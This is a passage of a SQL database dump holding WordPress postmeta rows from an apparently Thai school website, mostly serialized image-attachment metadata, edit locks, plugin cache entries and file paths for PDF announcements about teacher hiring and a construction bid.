(7822, 3448, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:687;s:6:\"height\";i:324;s:4:\"file\";s:30:\"2018/07/16-7-2561-10-54-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"16-7-2561-10-54-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"16-7-2561-10-54-02-300x141.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"16-7-2561-10-54-02-400x189.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7823, 3451, '_wp_attached_file', '2018/07/16-7-2561-11-13-02.jpg'),
(7824, 3451, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:243;s:4:\"file\";s:30:\"2018/07/16-7-2561-11-13-02.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"16-7-2561-11-13-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7825, 3452, '_wp_attached_file', '2018/07/นางศิริพรรณ-ยับยั้ง.jpg'),
(7826, 3452, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:196;s:6:\"height\";i:242;s:4:\"file\";s:67:\"2018/07/นางศิริพรรณ-ยับยั้ง.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:67:\"นางศิริพรรณ-ยับยั้ง-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7827, 3459, '_wp_attached_file', '2018/07/16-7-2561-11-29-11.jpg'),
(7828, 3459, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:294;s:6:\"height\";i:333;s:4:\"file\";s:30:\"2018/07/16-7-2561-11-29-11.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"16-7-2561-11-29-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"16-7-2561-11-29-11-265x300.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"16-7-2561-11-29-11-265x300.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7829, 3464, '_wp_attached_file', '2018/07/17-7-2561-9-08-40.jpg'),
(7830, 3464, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:955;s:6:\"height\";i:638;s:4:\"file\";s:29:\"2018/07/17-7-2561-9-08-40.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-08-40-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-08-40-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-08-40-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-08-40-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7831, 3465, '_wp_attached_file', '2018/07/17-7-2561-9-09-04.jpg'),
(7832, 3465, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:955;s:6:\"height\";i:632;s:4:\"file\";s:29:\"2018/07/17-7-2561-9-09-04.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-09-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-09-04-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-09-04-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-09-04-400x265.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7833, 3466, '_wp_attached_file', '2018/07/17-7-2561-9-09-27.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(7834, 3466, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:948;s:6:\"height\";i:317;s:4:\"file\";s:29:\"2018/07/17-7-2561-9-09-27.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-09-27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-09-27-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-09-27-768x257.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:257;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"17-7-2561-9-09-27-400x134.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7835, 3469, '_edit_lock', '1531897418:3'),
(7836, 3469, '_edit_last', '3'),
(7837, 3470, '_wp_attached_file', '2018/07/ประกาศ-รายชื่อผู้ชนะประกวดราคา-โดมพระวิษณุ.pdf'),
(7841, 3469, '_hide_featured', NULL),
(7842, 3469, '_wpas_done_all', '1'),
(7843, 3469, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575557135;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:5680;}}}}'),
(7844, 3474, '_wp_attached_file', '2018/07/111111.jpg'),
(7845, 3474, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1534;s:6:\"height\";i:742;s:4:\"file\";s:18:\"2018/07/111111.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"111111-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"111111-300x145.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"111111-768x371.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:371;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"111111-1024x495.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"111111-400x193.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7846, 3479, '_edit_lock', '1644569970:14'),
(7847, 3479, '_edit_last', '14'),
(7848, 3481, '_wp_attached_file', '2018/07/aj-prapas.jpg'),
(7849, 3481, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:274;s:6:\"height\";i:346;s:4:\"file\";s:21:\"2018/07/aj-prapas.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"aj-prapas-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"aj-prapas-238x300.jpg\";s:5:\"width\";i:238;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"aj-prapas-238x300.jpg\";s:5:\"width\";i:238;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7850, 3479, '_hide_featured', NULL),
(7851, 3484, '_tablepress_table_options', '{\"last_editor\":14,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(7852, 3484, '_tablepress_table_visibility', '{\"rows\":[1],\"columns\":[1,1,1]}'),
(7853, 3485, '_edit_lock', '1581044452:14'),
(7854, 3485, '_edit_last', '14'),
(7855, 3485, '_hide_featured', NULL),
(7858, 3504, '_edit_lock', '1535354381:1'),
(7859, 3504, '_edit_last', '1'),
(7860, 3504, 'manisha_demo_data', 's:152:\"a:1:{i:0;a:3:{s:12:\"counter_icon\";s:6:\"fa-eye\";s:13:\"counter_value\";s:4:\"1250\";s:13:\"counter_title\";s:42:\"จำนวนผู้เข้าชม\";}}\";'),
(7861, 3504, 'manisha_demo_count', '1'),
(7862, 3504, 'Counter_Meta_Settings', 's:332:\"a:11:{s:8:\"icon_clr\";s:7:\"#000000\";s:15:\"count_title_clr\";s:7:\"#000000\";s:13:\"count_num_clr\";s:7:\"#000000\";s:9:\"icon_size\";s:2:\"20\";s:14:\"count_num_size\";s:2:\"18\";s:10:\"title_size\";s:2:\"18\";s:9:\"cn_weight\";s:3:\"400\";s:11:\"font_family\";s:9:\"Open Sans\";s:12:\"display_icon\";s:3:\"yes\";s:9:\"cn_layout\";s:2:\"12\";s:10:\"custom_css\";s:0:\"\";}\";'),
(7863, 3504, '_hide_featured', NULL),
(7864, 3518, '_edit_lock', '1532337859:3'),
(7865, 3518, '_edit_last', '3'),
(7866, 3519, '_wp_attached_file', '2018/07/ประกาศ-รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นครูอัตราจ้าง-จำนวน-4-อัตรา.pdf'),
(7870, 3518, '_hide_featured', NULL),
(7871, 3518, '_wpas_done_all', '1'),
(7872, 3518, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575127802;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(7873, 3523, '_wp_attached_file', '2018/07/24-7-2561-9-59-35.jpg'),
(7874, 3523, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:983;s:6:\"height\";i:244;s:4:\"file\";s:29:\"2018/07/24-7-2561-9-59-35.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"24-7-2561-9-59-35-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"24-7-2561-9-59-35-300x74.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:74;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"24-7-2561-9-59-35-768x191.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"24-7-2561-9-59-35-400x99.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:99;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7875, 3528, '_edit_lock', '1532580931:3'),
(7876, 3528, '_edit_last', '3'),
(7877, 3529, '_wp_attached_file', '2018/07/ประกาศผลสอบ-ครูอัตราจ้าง-4-อัตรา.pdf'),
(7881, 3528, '_hide_featured', NULL),
(7882, 3528, '_wpas_done_all', '1'),
(7883, 3528, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575089062;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(7884, 3533, '_wp_attached_file', '2018/01/1-8-2561-14-08-54.jpg'),
(7885, 3533, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1035;s:6:\"height\";i:580;s:4:\"file\";s:29:\"2018/01/1-8-2561-14-08-54.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"1-8-2561-14-08-54-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"1-8-2561-14-08-54-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"1-8-2561-14-08-54-768x430.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"1-8-2561-14-08-54-1024x574.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:574;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"1-8-2561-14-08-54-400x224.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7887, 3535, '_edit_lock', '1533107824:3'),
(7888, 3535, '_edit_last', '3'),
(7893, 3535, '_hide_featured', NULL),
(7894, 3535, '_wpas_done_all', '1'),
(7895, 3535, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575544573;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4172;}i:2;a:1:{s:2:\"id\";i:4006;}}}}'),
(7896, 3540, '_edit_lock', '1533265318:3'),
(7897, 3540, '_edit_last', '3'),
(7898, 3541, '_wp_attached_file', '2018/08/3-8-2561-10-02-58.jpg'),
(7899, 3541, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:520;s:6:\"height\";i:653;s:4:\"file\";s:29:\"2018/08/3-8-2561-10-02-58.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"3-8-2561-10-02-58-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"3-8-2561-10-02-58-239x300.jpg\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"3-8-2561-10-02-58-239x300.jpg\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7903, 3540, '_hide_featured', NULL),
(7904, 3540, '_wpas_done_all', '1'),
(7905, 3544, '_wp_attached_file', '2018/08/37155728_627314850978040_7913403781759369216_o.jpg'),
(7906, 3544, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1568;s:6:\"height\";i:1044;s:4:\"file\";s:58:\"2018/08/37155728_627314850978040_7913403781759369216_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"37155728_627314850978040_7913403781759369216_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"37155728_627314850978040_7913403781759369216_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"37155728_627314850978040_7913403781759369216_o-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"37155728_627314850978040_7913403781759369216_o-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"37155728_627314850978040_7913403781759369216_o-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7907, 3540, '_thumbnail_id', '3544'),
(7910, 3545, '_edit_lock', '1533265691:3'),
(7911, 3545, '_edit_last', '3'),
(7912, 3546, '_wp_attached_file', '2018/08/37277238_629158637460328_4448582376208990208_o.jpg'),
(7913, 3546, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/37277238_629158637460328_4448582376208990208_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"37277238_629158637460328_4448582376208990208_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"37277238_629158637460328_4448582376208990208_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"37277238_629158637460328_4448582376208990208_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"37277238_629158637460328_4448582376208990208_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"37277238_629158637460328_4448582376208990208_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7914, 3545, '_thumbnail_id', '3546'),
(7918, 3545, '_hide_featured', NULL),
(7919, 3545, '_wpas_done_all', '1'),
(7920, 3549, '_edit_lock', '1533266241:3'),
(7921, 3549, '_edit_last', '3'),
(7922, 3550, '_wp_attached_file', '2018/08/37697567_635083873534471_1418842338859417600_o.jpg'),
(7923, 3550, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/08/37697567_635083873534471_1418842338859417600_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"37697567_635083873534471_1418842338859417600_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"37697567_635083873534471_1418842338859417600_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"37697567_635083873534471_1418842338859417600_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"37697567_635083873534471_1418842338859417600_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"37697567_635083873534471_1418842338859417600_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7924, 3549, '_thumbnail_id', '3550'),
(7928, 3549, '_hide_featured', NULL),
(7929, 3549, '_wpas_done_all', '1'),
(7930, 3553, '_edit_lock', '1533266542:3'),
(7931, 3553, '_edit_last', '3'),
(7932, 3554, '_wp_attached_file', '2018/08/37687818_635338383509020_5955663959171268608_o.jpg'),
